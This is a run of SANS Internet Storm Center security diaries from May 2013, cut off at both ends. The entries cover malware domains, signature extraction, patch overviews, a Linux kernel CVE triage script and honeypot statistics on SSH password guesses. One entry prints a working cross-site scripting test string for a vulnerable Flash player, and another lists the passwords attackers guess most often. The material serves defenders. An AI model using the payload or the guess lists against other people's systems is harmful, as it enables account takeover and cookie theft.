ppetoc.iestats.cc 24940 Hetzner Online AG Germany
ppetoc.iestats.cc 57172 Global Layer B.V. Netherlands

The host name portion of some of the domains looks like it is time dependent (incrementing ASCII), whereas other domains use (apparently) random names like d3acofzi7hjft.e-protections.su. Name servers involved today include ns1.abercrombienfr.net (currently AS1426) and ns1.semi-spa.net (currently AS50300). I doubt the former has anything to do with the clothing store; the domain was created four months ago.

Closer inspection of Michael's PCs revealed that each infected box was apparently running a slightly different version of the EXE. Anti-virus coverage is still thin (VirusTotal), but the heuristics of some products seem to be catching on. This sample looks more like a ransomware trojan than Caphaw, but we'll know more once we analyze all the information gathered so far.

If you have information to add on this particular malware or the domains mentioned, please comment below, or use our contact form.



Published: 2013-05-16

Extracting signatures from Apple .apps

As an add-on to ISC Handler Lenny Zeltser's earlier diary on extracting certificates from signed Windows binaries, here's how to do the same on a Mac. Given that today's blog over at F-Secure documents a screenshot-taking Mac spyware that is signed with a developer ID, signed bad .apps might actually be more prevalent than expected.

To verify and extract the signatures and certificates of an Apple .app, you can run (using Mail.app as the example):

codesign -dvvvv --extract-certificates  /Applications/Mail.app

This will save the certificates in DER format, named codesign0, codesign1, etc. These can then be displayed as usual with OpenSSL:

openssl x509 -inform DER -in codesign0 -text



Published: 2013-05-16

Cisco TelePresence Supervisor MSE 8050 Denial of Service Vulnerability

Cisco TelePresence Supervisor MSE 8050 contains a vulnerability that may allow an unauthenticated, remote attacker to cause high CPU utilization and a reload of the affected system.

Cisco has released free software updates that address this vulnerability. Workarounds that mitigate this vulnerability are not available. This advisory is available at the following link:


-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler


Published: 2013-05-15

Call for Papers - 4th annual Forensics and Incident Response Summit EU


The 4th annual Forensics and Incident Response Summit EU will take place on October 6-13 in Prague, one of the most historic European cities, in the context of the SANS Forensics Prague conference, the biggest Incident Response and Digital Forensics event in Europe to date.

The Summit will focus on high quality and extremely relevant content as well as panel discussions in Digital Forensics and Incident Response. In addition, we encourage you to take every opportunity to make the most of this event, from attending the Summit to registering for one or more of the post-summit training classes taught by SANS' top-rated instructors and course authors. Additional events such as DFIR NetWars, evening talks and the SANS Community Night will be taking place during that week too. This event promises to bring together the leading minds in digital forensics and incident response in the EU, as well as many other practitioners from a wide cross section of industries and company sizes. You will be able to share with all of them your challenges and find out new solutions that work, techniques and approaches you didn't even know existed.

Call for Speakers - Now Open

The 4th annual Forensics and Incident Response Summit Call for Speakers is now open.

If you are interested in presenting or participating on a panel: we are looking for user-presented case studies with communicable lessons. The Forensics Summit offers speakers opportunities for exposure and recognition as an industry leader. If you have something substantive, challenging, and original to offer, you are encouraged to submit a proposal.

Benefits of Speaking

  • Promotion of your speaking session and company recognition via the Forensic conference website and all printed materials
  • Visibility via the Forensic post-conference presentation email link for many months following the conference
  • Full conference badge to attend all Summit sessions
  • Private speaker lunch

Submission Guidelines

  • Title
  • Author Name(s)
  • Author Title
  • Company
  • Speaker Contact Information: Address, phone number, email address
  • Biography
  • Your biography should be approximately 160 words. You may include your current position, titles, areas of professional expertise, experience, awards, degrees, personal information, etc.
  • Abstract
  • The presentation abstract should outline your presentation and what attendees will learn. All content must be strictly educational.
  • The presentation should be relevant to: Media Exploitation Analysts, Legal, Incident Response Teams, Security Operations and Law Enforcement professionals.

Speaking Options:

  • Presentation: 45 minutes
  • Question & Answer: 10-15 minutes

Send your proposal to callforpapers-prague@sans.org by June 15, 2013 with the subject "SANS DFIR Summit EU CFP 2013."

Thank you for your interest in presenting

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler


Published: 2013-05-14

CVE-2013-2094: Linux privilege escalation

A vulnerability was discovered by fuzzing in Linux kernels 2.6.37 through 3.8.9. The vulnerability requires the kernel to be compiled with PERF_EVENTS, which unfortunately is the case for quite a few Linux distributions. CentOS even backported the vulnerable code to 2.6.32.

Impact is local privilege escalation, and exploit code is readily available.

More information: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2094
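The two conditions above, an affected version and a kernel built with PERF_EVENTS, are easy to check per host, but only as triage. The following is an added example written for this diary, not an exploit and not vendor code: it parses the uname -r string, reads the matching /boot/config-<release> file for CONFIG_PERF_EVENTS, and reports whether the host sits in the upstream 2.6.37-3.8.9 range or in the 2.6.32 series that received the backport. It cannot see whether a distribution has already shipped a fix under the same version number, so an in-range result means "check the vendor's errata", not "exploitable". The range constants and the sample release strings in the usage are taken from this diary; everything else is this example's own.

```python
import re

# Upstream range quoted in the diary; the CentOS/RHEL 2.6.32 series carried a
# backport of the affected perf code, so a bare version comparison would wrongly
# call it safe.
AFFECTED_RANGE = ((2, 6, 37), (3, 8, 9))
BACKPORTED_SERIES = {(2, 6, 32)}


def parse_kernel_version(release):
    """'3.8.9-1-amd64' -> (3, 8, 9); '2.6.32-358.el6.x86_64' -> (2, 6, 32).
    Vendor suffixes after the numeric part are ignored."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release string: %r" % release)
    return tuple(int(g) if g else 0 for g in m.groups())


def perf_events_enabled(config_text):
    """True if a kernel config (/boot/config-<release> or .config) sets CONFIG_PERF_EVENTS=y."""
    return re.search(r"^CONFIG_PERF_EVENTS=y\s*$", config_text, re.M) is not None


def assess(release, config_text):
    """Triage verdict for one host. 'in-range' and 'backported-series' both mean
    'go and confirm the patch level against the distribution's errata'."""
    if not perf_events_enabled(config_text):
        return "not-affected: kernel built without PERF_EVENTS"
    v = parse_kernel_version(release)
    lo, hi = AFFECTED_RANGE
    if lo <= v <= hi:
        return "in-range: %d.%d.%d, confirm patch level against vendor errata" % v
    if v in BACKPORTED_SERIES:
        return "backported-series: %d.%d.%d, confirm patch level against vendor errata" % v
    return "outside-range: %d.%d.%d" % v


if __name__ == "__main__":
    import platform
    release = platform.release()
    try:
        cfg = open("/boot/config-" + release).read()
    except OSError:
        cfg = None  # no config available: report unknown rather than assuming safe
    print(release, "->", assess(release, cfg) if cfg else "unknown: no kernel config found")
```

Run it as root or not, it only reads files; on a distribution kernel the verdict is a prompt to look up the errata for that exact package version, which is the only authoritative answer.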

Hat tip: James for sending us some pointers to this.

Swa Frantzen -- Section 66


Published: 2013-05-14

Microsoft Security Advisory 2846338

Microsoft today also released security advisory 2846338, indicating that they have updated their Malware Protection Engine (used in a variety of their anti-malware products) to fix a vulnerability in that engine which would allow an attacker to execute arbitrary code in the context of LocalSystem. Microsoft claims the vulnerability was publicly disclosed as a DoS.

CVE: CVE-2013-1346


Swa Frantzen -- Section 66


Published: 2013-05-14

Firefox & Thunderbird released

Mozilla decided to join the mayhem on Black Tuesday this month and released updates for Firefox and Thunderbird.

The updates bring the versions to:

  • Firefox 21.0
  • Firefox ESR 17.0.6
  • Thunderbird 17.0.6
  • Thunderbird ESR 17.0.6

Release notes:


Security content of the updates:


Swa Frantzen -- Section 66


Published: 2013-05-14

Microsoft May 2013 Black Tuesday Overview

Overview of the May 2013 Microsoft patches and their status.

Each entry lists the bulletin, the affected component where the bulletin singles one out, the KB article, known exploits, Microsoft's rating(**) and the ISC rating(*) for clients and servers.

MS13-037 (KB 2829530)
  The usual monthly MSIE cumulative patch, adding fixes for 11 more vulnerabilities. All but one are use-after-free vulnerabilities. The odd one out is about VBScript allowing read access to JSON data belonging to another domain.
  Replaces MS13-028.
  Known exploits: No publicly known exploits
  Microsoft rating: Critical
  ISC rating: clients Critical, servers Important

MS13-038 (KB 2847204)
  The anticipated IE8 fix.
  Note that IE9 is listed as affected as well, but is not given a rating "because the known attack vectors for the vulnerability discussed in this bulletin are blocked in a default configuration."
  Note that this is not the cumulative IE patch, nor is the fix part of the cumulative patch this month. The bulletin states there is no need to uninstall the Microsoft Fix-it released earlier for this vulnerability.
  Known exploits: Publicly discussed and exploit code available. Security advisory 2847140.
  Microsoft rating: Critical
  ISC rating: clients PATCH NOW, servers Important

MS13-039 (KB 2829254)
  A vulnerability in the handling of HTTP headers in the HTTP stack allows a denial of service.
  Known exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating: clients Important, servers Important

MS13-040 (KB 2836440)
  Incorrect validation of signed XML files allows changes to those files to go undetected, and an authentication bypass allows unauthenticated access. The impact of these vulnerabilities depends heavily on which applications make use of these features.
  Replaces MS10-041.
  Known exploits: Microsoft claims the vulnerability CVE-2013-1337 was publicly disclosed.
  Microsoft rating: Important
  ISC rating: clients Important, servers Important

MS13-041 (KB 2834695)
  A memory corruption vulnerability allows arbitrary code execution in the context of the current user.
  Note that the user-level install of Lync 2010 Attendee is only available from the Microsoft Download Center, not via automatic updates.
  Replaces MS12-066.
  Known exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating: clients Critical, servers Important

MS13-042 (KB 2830397)
  A multitude of vulnerabilities in Publisher allow arbitrary code execution.
  Replaces MS11-091.
  Known exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating: clients Critical, servers Important

MS13-043 (KB 2830399)
  Incorrect handling of shape data in Word allows arbitrary code execution with the rights of the logged-on user.
  Note that when Word is used to read incoming email messages, it can be affected merely by previewing emailed RTF data!
  Known exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating: clients Critical, servers Important

MS13-044 (KB 2834692)
  A problem in handling XML files that reference external files in Visio allows an information leak: read access with the rights of the logged-on user.
  Replaces MS11-060 and MS13-023.
  Known exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating: clients Important, servers Important

MS13-045 (KB 2813707)
  Affected: Windows Essentials
  Windows Writer, part of the Windows Essentials package, is a client to manage blogs. The vulnerability allows overriding proxy settings and overwriting files accessible to the logged-on user.
  Known exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating: clients Critical, servers Important

MS13-046 (KB 2840221)
  Affected: Kernel Mode Drivers
  Multiple vulnerabilities in kernel mode drivers allow privilege escalation.
  Replaces MS13-036 and MS13-031.
  Known exploits: No publicly known exploits
  Microsoft rating: Important
  ISC rating: clients Important, servers Important

We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. For servers we presume simple best practices, such as not using Outlook, MSIE, Word, etc. on them to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): Where Microsoft assigns several exploitability ratings to one bulletin, we show the worst of them rather than listing them all.

Swa Frantzen -- Section 66


Published: 2013-05-14

So what passwords are those ssh scanners trying?

If you run an ssh server (especially if you still run it on the default port), you've no doubt had plenty of folks scan your machine and run password guessing attacks against it.  BTW, you'll never get into mine that way, I only allow public/private key authentication, but that is beside the point here.  I've done a couple of other reports analyzing passwords, and I really like pipal by Robin Wood for much of the analysis (you can grab it from here).  I've been running a kippo ssh honeypot for the day job for about 2 years and I've done a couple of reports on the password guesses for the ThreatTraq webcast, but then I discovered that in addition to firewall logs and the 404 logs, we also collect kippo logs here at the SANS Internet Storm Center.  Ooh, more data!!  If you'd like to contribute, please grab https://isc.sans.edu/kipposcript.pl.  So, without further ado, here is what I've found in our kippo data (as of about 15 April 2013).  I should note here, though, that these are the guesses the bad guys are making.  They've most likely developed their lists based on what has worked for someone at some point, so they will be somewhat different from what you find when analyzing passwords from breaches, like my analysis of last year's Yahoo breach.

The Basics

Total entries = 15415314
Total unique entries = 46840


The Results

Top 10 passwords
123456 = 167854 (1.09%)
password = 113640 (0.74%)
cacutza = 99492 (0.65%)
__--_-__-_ = 79153 (0.51%)
123 = 63557 (0.41%)
root = 61560 (0.4%)
1234 = 58103 (0.38%)
123456789 = 57270 (0.37%)
12345 = 53445 (0.35%)
test = 52231 (0.34%)

Okay, the first thing to note is that the default password for kippo is 123456, so that may skew the above a bit.  The one I personally find most interesting is the 4th one, '__--_-__-_'.

Top 10 base words
password = 295354 (1.92%)
test = 192825 (1.25%)
pass = 127086 (0.82%)
root = 121704 (0.79%)
cacutza = 99492 (0.65%)
temp = 97145 (0.63%)
p@ssw0rd = 92650 (0.6%)
p4ssword = 88344 (0.57%)
changeme = 74842 (0.49%)
p4ssw0rd = 74329 (0.48%)

So, some variation on password (with or without substitutions).

Password length (count ordered)
6 = 2708563 (17.57%)
8 = 2275062 (14.76%)
7 = 1550776 (10.06%)
9 = 1394644 (9.05%)
10 = 1234997 (8.01%)
4 = 1143617 (7.42%)
5 = 1025693 (6.65%)
12 = 766462 (4.97%)
11 = 647696 (4.2%)
3 = 437702 (2.84%)

The password guesses varied in length from 1 character (do people actually allow 1-character passwords?) to 71 characters.  The longest ones are shown below:

56 = 4504 (0.03%)
57 = 180 (0.0%)
58 = 465 (0.0%)
60 = 17 (0.0%)
62 = 800 (0.01%)
63 = 69 (0.0%)
64 = 369 (0.0%)
70 = 9 (0.0%)
71 = 908 (0.01%)

The mix

One to six characters = 5463941 (35.44%)
One to eight characters = 9289779 (60.26%)
More than eight characters = 6125535 (39.74%)

Only lowercase alpha = 5126974 (33.26%)
Only uppercase alpha = 140773 (0.91%)
Only alpha = 5267747 (34.17%)
Only numeric = 1906165 (12.37%)

First capital last symbol = 135964 (0.88%)
First capital last number = 958843 (6.22%)

Last digit
3 = 1621502 (10.52%)
1 = 1394507 (9.05%)
0 = 620126 (4.02%)
4 = 593100 (3.85%)
6 = 548727 (3.56%)
2 = 478758 (3.11%)
5 = 420699 (2.73%)
9 = 407320 (2.64%)
8 = 318715 (2.07%)
7 = 303304 (1.97%)

Last 3 digits (Top 10)
123 = 1156095 (7.5%)
456 = 380369 (2.47%)
234 = 340074 (2.21%)
345 = 234638 (1.52%)
321 = 212258 (1.38%)
789 = 192424 (1.25%)
678 = 166984 (1.08%)
567 = 154030 (1.0%)
001 = 146204 (0.95%)
111 = 91160 (0.59%)

Character sets
loweralpha: 5126974 (33.26%)
loweralphanum: 4803721 (31.16%)
numeric: 1906165 (12.37%)
loweralphaspecialnum: 803707 (5.21%)
mixedalphanum: 768137 (4.98%)
mixedalphaspecialnum: 641067 (4.16%)
loweralphaspecial: 344881 (2.24%)
upperalphanum: 181283 (1.18%)
mixedalpha: 151523 (0.98%)
special: 149786 (0.97%)
upperalpha: 140773 (0.91%)
upperalphaspecialnum: 133340 (0.86%)
mixedalphaspecial: 91536 (0.59%)
upperalphaspecial: 81044 (0.53%)
specialnum: 66165 (0.43%)

Character set ordering
allstring: 5419270 (35.16%)
othermask: 3833967 (24.87%)
stringdigit: 2622232 (17.01%)
alldigit: 1906165 (12.37%)
stringdigitstring: 478523 (3.1%)
digitstring: 446101 (2.89%)
stringspecial: 184687 (1.2%)
allspecial: 149786 (0.97%)
stringspecialstring: 117368 (0.76%)
digitstringdigit: 114141 (0.74%)
stringspecialdigit: 101918 (0.66%)
specialstring: 25205 (0.16%)
specialstringspecial: 15951 (0.1%)


Some final thoughts

Okay, there is some interesting stuff there, and if you are interested in the pieces of the standard pipal report that I didn't include here, I've put the full report up on my handler page.  One of the other things I took a look at was how many in the mix satisfy the standard definition of a "complex" password [lower case, upper case, digits, special characters] (choose 3) and length >= 8.  620413 (4.02%) of the passwords satisfy this definition of complex.  However, when you look at unique passwords, only 1286 (2.75% of the 46840 unique ones) are complex.  So, at least one takeaway is that the more complex you make your crucial passwords, the less likely you are to fall victim to this type of password guessing attack.  Of course, 173 of those 1286 were some variation on 'password' with substitutions or digits and/or special characters tacked on the end.  So, what do you think?  Is there some other aspect of the passwords that I should have looked at?  Let us know in the comment section below or via our contact form.
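As an added example, written for this diary and neither part of the original post nor pipal itself, here is a small pipal-style pass in Python over kippo log lines: it pulls the guesses out and computes the top guesses, the length distribution, the character-set labels used in the tables above, base words, and the "complex" rule from the paragraph above. The log excerpt is constructed, not ISC data, and the line format it assumes is kippo's "login attempt [user/password] failed" wording; the numbers it produces describe the sample only.

```python
import re
from collections import Counter

# One line per guess, in kippo's "login attempt [user/password] failed|succeeded" form
# (an assumption about the log format; a password containing ']' would need a smarter regex).
LOGIN_RE = re.compile(r"login attempt \[(?P<user>[^/\]]*)/(?P<password>[^\]]*)\] (?:failed|succeeded)")

# Constructed sample log, not real honeypot data.
SAMPLE_LOG = """\
2013-04-15 03:12:01+0000 [SSHService ssh-userauth on HoneyPotTransport,12,198.51.100.7] login attempt [root/123456] failed
2013-04-15 03:12:02+0000 [SSHService ssh-userauth on HoneyPotTransport,12,198.51.100.7] login attempt [root/password] failed
2013-04-15 03:12:03+0000 [SSHService ssh-userauth on HoneyPotTransport,12,198.51.100.7] login attempt [admin/123456] failed
2013-04-15 03:12:04+0000 [SSHService ssh-userauth on HoneyPotTransport,12,198.51.100.7] login attempt [root/P@ssw0rd1] failed
2013-04-15 03:12:05+0000 [SSHService ssh-userauth on HoneyPotTransport,12,198.51.100.7] login attempt [test/test] failed
2013-04-15 03:12:06+0000 [SSHService ssh-userauth on HoneyPotTransport,12,198.51.100.7] login attempt [root/__--_-__-_] failed
2013-04-15 03:12:07+0000 [SSHService ssh-userauth on HoneyPotTransport,12,198.51.100.7] login attempt [admin/Summer2013] failed
2013-04-15 03:12:08+0000 [SSHService ssh-userauth on HoneyPotTransport,12,198.51.100.7] login attempt [root/123456] succeeded
2013-04-15 03:12:09+0000 [SSHService ssh-userauth on HoneyPotTransport,12,198.51.100.7] login attempt [root/p4ssw0rd] failed
2013-04-15 03:12:10+0000 [SSHService ssh-userauth on HoneyPotTransport,12,198.51.100.7] login attempt [oracle/oracle123] failed
"""


def parse_guesses(log_text):
    """Return the guessed passwords, one per login attempt line, in log order."""
    guesses = []
    for line in log_text.splitlines():
        m = LOGIN_RE.search(line)
        if m:
            guesses.append(m.group("password"))
    return guesses


def char_classes(pw):
    """Which of the four classes (lower, upper, digit, special) the password uses."""
    classes = set()
    for ch in pw:
        if ch.islower():
            classes.add("lower")
        elif ch.isupper():
            classes.add("upper")
        elif ch.isdigit():
            classes.add("digit")
        else:
            classes.add("special")
    return classes


def is_complex(pw):
    """The 'complex' rule used in the diary: length >= 8 and at least 3 of the 4 classes."""
    return len(pw) >= 8 and len(char_classes(pw)) >= 3


def charset_label(pw):
    """pipal-style label, e.g. 'loweralphanum', 'mixedalphaspecialnum', 'numeric', 'special'."""
    c = char_classes(pw)
    if not c:
        return "empty"
    if "lower" in c or "upper" in c:
        case = "mixed" if {"lower", "upper"} <= c else ("lower" if "lower" in c else "upper")
        label = case + "alpha"
        if "special" in c:
            label += "special"
        if "digit" in c:
            label += "num"
        return label
    if c == {"digit"}:
        return "numeric"
    if c == {"special"}:
        return "special"
    return "specialnum"


def base_word(pw):
    """Approximation of pipal's base word: strip leading/trailing digits and symbols, lowercase."""
    return re.sub(r"^[^A-Za-z]+|[^A-Za-z]+$", "", pw).lower()


def summarize(passwords, top=10):
    """The headline statistics the diary reports, computed from a list of guesses."""
    counts = Counter(passwords)
    return {
        "total": len(passwords),
        "unique": len(counts),
        "top": counts.most_common(top),
        "lengths": Counter(len(p) for p in passwords),
        "charsets": Counter(charset_label(p) for p in passwords),
        "base_words": Counter(b for b in (base_word(p) for p in passwords) if b).most_common(top),
        "complex": sum(1 for p in passwords if is_complex(p)),
        "unique_complex": sum(1 for p in counts if is_complex(p)),
    }


if __name__ == "__main__":
    stats = summarize(parse_guesses(SAMPLE_LOG))
    for key, value in stats.items():
        print("%-14s %s" % (key, value))
```

Feed it the real thing with parse_guesses(open("kippo.log").read()) and the percentages in the tables above are counts divided by stats["total"]. The two "complex" figures are computed over all guesses and over unique guesses respectively, which is the distinction the paragraph above draws.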

Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

The opinions expressed here are strictly those of the author and do not necessarily represent those of SANS, the Internet Storm Center, the author's spouse, kids, or pets (except maybe the ornery cat).


Published: 2013-05-11

Extracting Digital Signatures from Signed Malware

Sometimes attackers digitally sign their malicious software. Examining properties of the signature helps malware analysts understand the context of the incident. Moreover, analysts could use the signature as an indicator of compromise. Here are some tips and tools for determining whether a suspicious Windows executable has been signed and for extracting the embedded signature in a Linux environment. We'll look at Pyew, Disitool and get a bit of help from OpenSSL.

Microsoft's Windows Authenticode Portable Executable Signature Format document explains that the signatures can be embedded "in a Windows PE file, in a location specified by the Certificate Table entry in Optional Header Data Directories." The location of the signature is stored within the PE header's OptionalHeader structure's Security field.

One way to determine whether the file contains an embedded signature is to use Pyew, a command-line hex editor/disassembler for malware analysis. After loading the sample into Pyew, enter the command "pyew.pe.OPTIONAL_HEADER.DATA_DIRECTORY" and look at the size of the IMAGE_DIRECTORY_ENTRY_SECURITY entry. A non-zero value indicates that the file probably includes an embedded signature, as shown below:

[Screenshot: Pyew Signature Header]

In the Pyew output above, we see that the size of IMAGE_DIRECTORY_ENTRY_SECURITY is non-zero. This indicates that kiwi.exe probably includes an embedded signature.

Disitool provides another way of determining whether a PE file includes a signature. This tool, created by Didier Stevens, can delete, copy, extract and add signatures. If you attempt to extract a signature from a non-signed file, Disitool will tell you "source file not signed."

In the example below, we see that the file has been signed. The author of this malicious file seems to have used a stolen certificate to sign the specimen. Disitool's "extract" command pulled out the signature, so we can examine it.

[Screenshot: Disitool Extract Signature]

Disitool saves the extracted signature, a PKCS#7 SignedData structure that embeds the signing certificates, in binary DER format. You can look at the strings embedded in the DER file to examine its contents. Even better, you can use the following OpenSSL command to convert the DER file into a more informative text file:

openssl pkcs7 -inform DER -print_certs -text -in INPUT_FILE > OUT_FILE

Knowing how to spot signed files and extract signature details can be helpful for malware and forensic analysts. On Windows, you can gather some of these details by right-clicking on the PE file and looking at its properties, as well as with the help of Microsoft's Sign Tool and Sigcheck tools. On Linux, you can accomplish this with the help of Pyew, Disitool and OpenSSL, which are installed on REMnux for your convenience.
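The Pyew and Disitool steps above can be reproduced in a few dozen lines of Python. The following is an added example written for this diary, not code from Pyew, Disitool or REMnux: it walks the PE headers to the Certificate Table entry (the data directory at index 4, IMAGE_DIRECTORY_ENTRY_SECURITY), reports its offset and size, and copies out the PKCS#7 blob that the openssl command above can decode. The build_pe helper and the stand-in byte string used with it are constructed test fixtures, not a real signature and not a real sample.

```python
import struct

# Index of the Certificate Table in the optional header's data directories
# (IMAGE_DIRECTORY_ENTRY_SECURITY in winnt.h) and the WIN_CERTIFICATE constants
# for an Authenticode PKCS#7 SignedData entry.
IMAGE_DIRECTORY_ENTRY_SECURITY = 4
WIN_CERT_REVISION_2_0 = 0x0200
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002


def security_directory(pe):
    """Return (file_offset, size) of the Attribute Certificate Table, or None when
    the directory entry is empty (the Pyew check above: size 0 means unsigned).
    Unlike the other data directories this entry holds a raw file offset, not an
    RVA, because the table is never mapped into memory."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                          # skip signature + 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                               # PE32
        nrva_off, dd_off = opt + 92, opt + 96
    elif magic == 0x20B:                             # PE32+
        nrva_off, dd_off = opt + 108, opt + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    n_dirs = struct.unpack_from("<I", pe, nrva_off)[0]
    if n_dirs <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return None
    offset, size = struct.unpack_from("<II", pe, dd_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    if size == 0:
        return None
    if offset + size > len(pe):
        raise ValueError("certificate table points outside the file")
    return offset, size


def extract_pkcs7(pe):
    """Return the DER bytes of the first WIN_CERTIFICATE entry's bCertificate (the
    PKCS#7 SignedData that Disitool writes out), or None if the file is unsigned.
    Entry layout: dwLength(4) wRevision(2) wCertificateType(2) bCertificate[...],
    each entry padded to an 8-byte boundary."""
    loc = security_directory(pe)
    if loc is None:
        return None
    offset, size = loc
    length, _revision, cert_type = struct.unpack_from("<IHH", pe, offset)
    if length < 8 or length > size:
        raise ValueError("inconsistent WIN_CERTIFICATE length")
    if cert_type != WIN_CERT_TYPE_PKCS_SIGNED_DATA:
        raise ValueError("unexpected certificate type 0x%04x" % cert_type)
    return bytes(pe[offset + 8:offset + length])


def build_pe(blob=None):
    """Constructed, minimal PE32 image (no sections) used only to exercise the parser.
    With blob=None the Certificate Table entry is left empty (an unsigned file);
    otherwise the table holds one WIN_CERTIFICATE wrapping blob."""
    opt_size = 224                                   # PE32 optional header, 16 directories
    cert_off = 0x40 + 4 + 20 + opt_size
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)            # Magic: PE32
    struct.pack_into("<I", opt, 92, 16)              # NumberOfRvaAndSizes
    cert = b""
    if blob is not None:
        cert = struct.pack("<IHH", 8 + len(blob), WIN_CERT_REVISION_2_0,
                           WIN_CERT_TYPE_PKCS_SIGNED_DATA) + blob
        cert += b"\0" * (-len(cert) % 8)             # pad the table to 8 bytes
        struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                         cert_off, len(cert))
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, opt_size, 0x102)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    return dos + b"PE\0\0" + coff + bytes(opt) + cert


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read()
    der = extract_pkcs7(data)
    if der is None:
        print("source file not signed")
    else:
        open(sys.argv[2], "wb").write(der)
        print("wrote %d bytes of PKCS#7 to %s" % (len(der), sys.argv[2]))
```

Two caveats that apply to the tools above as well: a non-zero directory size only says that something occupies the table, and this parser will hand back whatever bytes sit there, so always run the output through the openssl pkcs7 command above and check that it parses. A signature that parses still says nothing about whether it verifies against the file's hash or whether the certificate was stolen or revoked; that is what Sigcheck and SignTool on Windows check.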


-- Lenny Zeltser

Lenny Zeltser focuses on safeguarding customers' IT operations at NCR Corp. He also teaches how to analyze malware at SANS Institute. Lenny is active on Twitter. He also writes a security blog.


Published: 2013-05-10

Microsoft and Adobe Patch Tuesday Pre-Release

Both Adobe and Microsoft released pre-announcements for next week's Patch Tuesday.

Microsoft is working on having a patch available for the Internet Explorer 8 0-day vulnerability. [1] There are two critical Internet Explorer patches, one specifically for Internet Explorer 8, and the other one for all current versions. The latter (referred to as "Bulletin 1" by Microsoft) is likely the usual roll-up patch.

Those are the only two critical bulletins next week. The rest cover "the usual" (Office, Windows, Lync and Windows Essentials) and are rated important. [2]

Adobe announced only one bulletin, for Acrobat and Reader. [3] There is no patch scheduled for ColdFusion at this point.

[1] http://blogs.technet.com/b/msrc/archive/2013/05/09/advance-notification-service-for-the-may-2013-security-bulletin-release.aspx
[2] http://technet.microsoft.com/en-us/security/bulletin/ms13-may
[3] http://www.adobe.com/support/security/bulletins/apsb13-15.html



Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-05-08

"De Flashing" the ISC Web Site and Flash XSS issues

You may have noticed that earlier today I removed the Flash player that we used to play audio files on our site. The trigger for this was a report that the particular Flash player we used (an open source player usually used with WordPress) is susceptible to cross-site scripting [1][2]. Instead of upgrading to the newer (patched) version, we decided to remove the player.

The other part of this is that pretty much all current browsers do have reasonable support for HTML 5 audio tags. We do offer our audio files, like the daily podcast, in MP3 as well as Ogg Vorbis format, which covers all major browsers. We also offer links to the direct files in case someone would like to play the files "offline" and we do offer via RSS feeds various MP3/Podcast players. 

So in short, the flash player wasn't worth maintaining. 

On the other hand, we will try to embrace more of the HTML5 features as we move the site forward. The data will still be available in pretty much any browser (yup. ... lynx), but you will see our graphs and similar parts of the site take advantage of newer browser features to make it easier to navigate the data. For now, we still have a couple of Flash movies on the site, but we are working on moving them either to YouTube or to our own (again HTML5-based) solution.

Big thanks to Rafay Baloch [3] for reporting the XSS vulnerability to us! 

Example exploit string to test your own player: player.swf ? playerID= \\%22))} catch(e){alert('Your%20cookies%20are%20mine%20now')} //    (remove spaces, but keep the // at the end)

[1] http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1464
[2] http://wordpress.org/extend/plugins/audio-player/
[3] http://rafayhackingarticles.net twitter @rafaybaloch

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2013-05-08

Syria drops from Internet 7th May 2013

There's been a number of reports that Internet connectivity to Syria has been broken or disabled and there is no official word on what has caused this.

Google's Transparency Report page [1] displays the drop-off, and a more comprehensive report is on the Umbrella Labs blog [2].



[1]  http://www.google.com/transparencyreport/traffic/#expand=SY

[2] http://labs.umbrella.com/2013/05/07/breaking-news-traffic-from-syria-disappears-from-internet/   



Chris Mohan --- Internet Storm Center Handler on Duty


Published: 2013-05-08

Are there any websites that are NOT compromised?

Today was yet another day with lots of compromised websites, some notable others less.

